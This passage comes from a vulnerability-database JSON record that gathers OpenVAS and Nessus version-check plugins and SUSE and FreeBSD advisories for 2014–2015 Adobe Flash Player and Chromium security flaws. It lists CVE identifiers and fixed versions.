script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 11.2.202.418 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.418 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"11.2.202.418\"))\n{\n report = report_fixed_ver(installed_version:playerVer, fixed_version:\"11.2.202.418\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:14:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "modified": "2019-07-17T00:00:00", "published": "2014-11-14T00:00:00", "id": "OPENVAS:1361412562310804794", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804794", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\n#\n# Authors:\n# Thanga Prakash S <tprakash@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804794\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-0573\", \"CVE-2014-0574\", \"CVE-2014-0576\", \"CVE-2014-0577\",\n \"CVE-2014-0581\", \"CVE-2014-0582\", \"CVE-2014-0583\", \"CVE-2014-0584\",\n \"CVE-2014-0585\", \"CVE-2014-0586\", \"CVE-2014-0588\", \"CVE-2014-0589\",\n \"CVE-2014-0590\", \"CVE-2014-8437\", \"CVE-2014-8438\", \"CVE-2014-8440\",\n \"CVE-2014-8441\", \"CVE-2014-8442\");\n script_bugtraq_id(71033, 71041, 71037, 71038, 71042, 71039, 71035, 71043, 71044,\n 71045, 71048, 71051, 71046, 71036, 71049, 71047, 71050, 71040);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-11-14 11:46:13 +0530 (Fri, 14 Nov 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities(APSB14-24)-(Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple Flaws are due to,\n\n - An use-after-free error.\n\n - A double free error.\n\n - Multiple type confusion errors.\n\n - An error related to a permission issue.\n\n - Multiple unspecified error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player version before\n 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 13.0.0.252 or 15.0.0.223 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/59978\");\n script_xref(name:\"URL\", value:\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Adobe/Flash/Player/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:playerVer, test_version:\"13.0.0.252\") ||\n version_in_range(version:playerVer, test_version:\"14.0.0\", test_version2:\"15.0.0.222\"))\n{\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "chromium was updated to version 39.0.2171.65 to fix 13 security issues.\n\n These security issues were fixed:\n - Use-after-free in pepper plugins (CVE-2014-7906).\n - Buffer overflow in OpenJPEG before r2911 in PDFium, as used in Google\n Chromebefore 39.0.2171.65, al... (CVE-2014-7903).\n - Uninitialized memory read in Skia (CVE-2014-7909).\n - Unspecified security issues (CVE-2014-7910).\n - Integer overflow in media (CVE-2014-7908).\n - Integer overflow in the opj_t2_read_packet_data function\n infxcodec/fx_libopenjpeg/libopenjpeg20/t2.... (CVE-2014-7901).\n - Use-after-free in blink (CVE-2014-7907).\n - Address bar spoofing (CVE-2014-7899).\n - Buffer overflow in Skia (CVE-2014-7904).\n - Use-after-free vulnerability in the CPDF_Parser (CVE-2014-7900).\n - Use-after-free vulnerability in PDFium allows DoS (CVE-2014-7902).\n - Flaw allowing navigation to intents that do not have the BROWSABLE\n category (CVE-2014-7905).\n - Double-free in Flash (CVE-2014-0574).\n\n", "edition": 1, "modified": "2014-12-12T09:04:56", "published": "2014-12-12T09:04:56", "id": "OPENSUSE-SU-2014:1626-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-12/msg00015.html", "type": "suse", "title": "Security update for chromium (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "flash-player was updated to version 11.2.202.418 to fix 18 security issues:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n * A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n * Type confusion vulnerabilities that could lead to code execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n * Heap buffer overflow vulnerabilities that could lead to code\n execution (CVE-2014-0582, CVE-2014-0589).\n * An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n * A heap buffer overflow vulnerability that could be exploited to\n perform privilege escalation from low to medium integrity level\n (CVE-2014-0583).\n * A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\n\n Further information can be found at\n <a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\">http://helpx.adobe.com/security/products/flash-player/apsb14-24.html</a>\n &lt;<a rel=\"nofollow\" href=\"http://helpx.adobe.com/security/products/flash-player/apsb14-24.html\">http://helpx.adobe.com/security/products/flash-player/apsb14-24.html</a>&gt; .\n\n Security Issues:\n\n * CVE-2014-0576\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0576\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0576</a>&gt;\n * CVE-2014-0581\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0581\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0581</a>&gt;\n * CVE-2014-8440\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8440</a>&gt;\n * CVE-2014-8441\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8441\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8441</a>&gt;\n * CVE-2014-0573\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0573\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0573</a>&gt;\n * CVE-2014-0588\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0588\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0588</a>&gt;\n * CVE-2014-8438\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8438\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8438</a>&gt;\n * CVE-2014-0574\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0574\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0574</a>&gt;\n * CVE-2014-0577\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0577\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0577</a>&gt;\n * CVE-2014-0584\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0584\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0584</a>&gt;\n * CVE-2014-0585\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0585\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0585</a>&gt;\n * CVE-2014-0586\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0586\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0586</a>&gt;\n * CVE-2014-0590\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0590\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0590</a>&gt;\n * CVE-2014-0582\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0582\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0582</a>&gt;\n * CVE-2014-0589\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0589\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0589</a>&gt;\n * CVE-2014-8437\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8437\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8437</a>&gt;\n * CVE-2014-0583\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0583\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0583</a>&gt;\n * CVE-2014-8442\n &lt;<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8442\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8442</a>&gt;\n\n", "edition": 1, "modified": "2014-11-18T01:05:27", "published": "2014-11-18T01:05:27", "id": "SUSE-SU-2014:1442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00015.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0581", "CVE-2014-0574", "CVE-2014-0576", "CVE-2014-0590", "CVE-2014-8442", "CVE-2014-0583", "CVE-2014-0577", "CVE-2014-0589", "CVE-2014-0584", "CVE-2014-0586", "CVE-2014-0573", "CVE-2014-0585", "CVE-2014-8437", "CVE-2014-0582", "CVE-2014-0588", "CVE-2014-8440", "CVE-2014-8438", "CVE-2014-8441"], "description": "flash-player was updated to version 11.2.202.418 to fix 18 security issues.\n\n These security issues were fixed:\n - Memory corruption vulnerabilities that could lead to code execution\n (CVE-2014-0576, CVE-2014-0581, CVE-2014-8440, CVE-2014-8441).\n - Use-after-free vulnerabilities that could lead to code execution\n (CVE-2014-0573, CVE-2014-0588, CVE-2014-8438).\n - A double free vulnerability that could lead to code execution\n (CVE-2014-0574).\n - Type confusion vulnerabilities that could lead to code execution\n (CVE-2014-0577, CVE-2014-0584, CVE-2014-0585, CVE-2014-0586,\n CVE-2014-0590).\n - Heap buffer overflow vulnerabilities that could lead to code execution\n (CVE-2014-0582, CVE-2014-0589).\n - An information disclosure vulnerability that could be exploited to\n disclose session tokens (CVE-2014-8437).\n - A heap buffer overflow vulnerability that could be exploited to perform\n privilege escalation from low to medium integrity level (CVE-2014-0583).\n - A permission issue that could be exploited to perform privilege\n escalation from low to medium integrity level (CVE-2014-8442).\n\n", "edition": 1, "modified": "2014-11-18T12:04:40", "published": "2014-11-18T12:04:40", "id": "OPENSUSE-SU-2014:1444-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00016.html", "type": "suse", "title": "Security update for flash-player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2014-0581", "CVE-2014-0574", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2014-0576", "CVE-2015-0353", "CVE-2015-3041", "CVE-2014-0590", "CVE-2015-0350", "CVE-2014-8442", "CVE-2015-3040", "CVE-2014-0583", "CVE-2015-0349", "CVE-2014-0577", "CVE-2015-0352", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2015-3044", "CVE-2015-0331", "CVE-2014-0558", "CVE-2014-0586", "CVE-2015-0347", "CVE-2015-0354", "CVE-2014-0573", "CVE-2014-0585", "CVE-2015-3039", "CVE-2014-8437", "CVE-2015-0360", "CVE-2014-0582", "CVE-2015-3038", "CVE-2015-0359", "CVE-2014-0588", "CVE-2015-0356", "CVE-2015-3043", "CVE-2014-8440", "CVE-2015-3042", "CVE-2014-8438", "CVE-2015-0332", "CVE-2014-0564", "CVE-2014-8441"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "edition": 1, "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "description": "\nGoogle Chrome Releases reports:\n\n42 security fixes in this release, including:\n\n[389734] High CVE-2014-7899: Address bar spoofing. Credit to\n\t Eli Grey.\n[406868] High CVE-2014-7900: Use-after-free in pdfium. Credit\n\t to Atte Kettunen from OUSPG.\n[413375] High CVE-2014-7901: Integer overflow in pdfium. Credit\n\t to cloudfuzzer.\n[414504] High CVE-2014-7902: Use-after-free in pdfium. Credit\n\t to cloudfuzzer.\n[414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit\n\t to cloudfuzzer.\n[418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to\n\t Atte Kettunen from OUSPG.\n[421817] High CVE-2014-7905: Flaw allowing navigation to\n\t intents that do not have the BROWSABLE category. Credit to\n\t WangTao(neobyte) of Baidu X-Team.\n[423030] High CVE-2014-7906: Use-after-free in pepper plugins.\n\t Credit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n[423703] High CVE-2014-0574: Double-free in Flash. Credit to\n\t biloulehibou.\n[424453] High CVE-2014-7907: Use-after-free in blink. Credit to\n\t Chen Zhang (demi6od) of the NSFOCUS Security Team.\n[425980] High CVE-2014-7908: Integer overflow in media. Credit\n\t to Christoph Diehl.\n[391001] Medium CVE-2014-7909: Uninitialized memory read in\n\t Skia. Credit to miaubiz.\nCVE-2014-7910: Various fixes from internal audits, fuzzing and\n\t other initiatives.\n\n\n", "edition": 4, "modified": "2014-11-18T00:00:00", "published": "2014-11-18T00:00:00", "id": "D395E44F-6F4F-11E4-A444-00262D5ED8EE", "href": "https://vuxml.freebsd.org/freebsd/d395e44f-6f4f-11e4-a444-00262d5ed8ee.html", "title": "chromium -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:50:30", "description": "Google Chrome Releases reports :\n\n42 security fixes in this release, including :\n\n- [389734] High CVE-2014-7899: Address bar spoofing. Credit to Eli\nGrey.\n\n- [406868] High CVE-2014-7900: Use-after-free in pdfium. Credit to\nAtte Kettunen from OUSPG.\n\n- [413375] High CVE-2014-7901: Integer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [414504] High CVE-2014-7902: Use-after-free in pdfium. Credit to\ncloudfuzzer.\n\n- [414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to Atte\nKettunen from OUSPG.\n\n- [421817] High CVE-2014-7905: Flaw allowing navigation to intents\nthat do not have the BROWSABLE category. Credit to WangTao(neobyte) of\nBaidu X-Team.\n\n- [423030] High CVE-2014-7906: Use-after-free in pepper plugins.\nCredit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n\n- [423703] High CVE-2014-0574: Double-free in Flash. Credit to\nbiloulehibou.\n\n- [424453] High CVE-2014-7907: Use-after-free in blink. Credit to Chen\nZhang (demi6od) of the NSFOCUS Security Team.\n\n- [425980] High CVE-2014-7908: Integer overflow in media. Credit to\nChristoph Diehl.\n\n- [391001] Medium CVE-2014-7909: Uninitialized memory read in Skia.\nCredit to miaubiz.\n\n- CVE-2014-7910: Various fixes from internal audits, fuzzing and other\ninitiatives.", "edition": 21, "published": "2014-11-19T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (d395e44f-6f4f-11e4-a444-00262d5ed8ee)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0574", "CVE-2014-7899", "CVE-2014-7908", "CVE-2014-7906", "CVE-2014-7909", "CVE-2014-7907", "CVE-2014-7904", "CVE-2014-7901", "CVE-2014-7903", "CVE-2014-7905", "CVE-2014-7910", "CVE-2014-7902", "CVE-2014-7900"], "modified": "2014-11-19T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "p-cpe:/a:freebsd:freebsd:chromium"], "id": "FREEBSD_PKG_D395E44F6F4F11E4A44400262D5ED8EE.NASL", "href": "https://www.tenable.com/plugins/nessus/79320", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79320);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0574\", \"CVE-2014-7899\", \"CVE-2014-7900\", \"CVE-2014-7901\", \"CVE-2014-7902\", \"CVE-2014-7903\", \"CVE-2014-7904\", \"CVE-2014-7905\", \"CVE-2014-7906\", \"CVE-2014-7907\", \"CVE-2014-7908\", \"CVE-2014-7909\", \"CVE-2014-7910\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (d395e44f-6f4f-11e4-a444-00262d5ed8ee)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n42 security fixes in this release, including :\n\n- [389734] High CVE-2014-7899: Address bar spoofing. Credit to Eli\nGrey.\n\n- [406868] High CVE-2014-7900: Use-after-free in pdfium. Credit to\nAtte Kettunen from OUSPG.\n\n- [413375] High CVE-2014-7901: Integer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [414504] High CVE-2014-7902: Use-after-free in pdfium. Credit to\ncloudfuzzer.\n\n- [414525] High CVE-2014-7903: Buffer overflow in pdfium. Credit to\ncloudfuzzer.\n\n- [418161] High CVE-2014-7904: Buffer overflow in Skia. Credit to Atte\nKettunen from OUSPG.\n\n- [421817] High CVE-2014-7905: Flaw allowing navigation to intents\nthat do not have the BROWSABLE category. Credit to WangTao(neobyte) of\nBaidu X-Team.\n\n- [423030] High CVE-2014-7906: Use-after-free in pepper plugins.\nCredit to Chen Zhang (demi6od) of the NSFOCUS Security Team.\n\n- [423703] High CVE-2014-0574: Double-free in Flash. Credit to\nbiloulehibou.\n\n- [424453] High CVE-2014-7907: Use-after-free in blink. Credit to Chen\nZhang (demi6od) of the NSFOCUS Security Team.\n\n- [425980] High CVE-2014-7908: Integer overflow in media. Credit to\nChristoph Diehl.\n\n- [391001] Medium CVE-2014-7909: Uninitialized memory read in Skia.\nCredit to miaubiz.\n\n- CVE-2014-7910: Various fixes from internal audits, fuzzing and other\ninitiatives.\"\n );\n # http://googlechromereleases.blogspot.nl/2014/11/stable-channel-update_18.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f4b30c17\"\n );\n # https://vuxml.freebsd.org/freebsd/d395e44f-6f4f-11e4-a444-00262d5ed8ee.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a894c63a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<39.0.2171.65\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<39.0.2171.65\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, 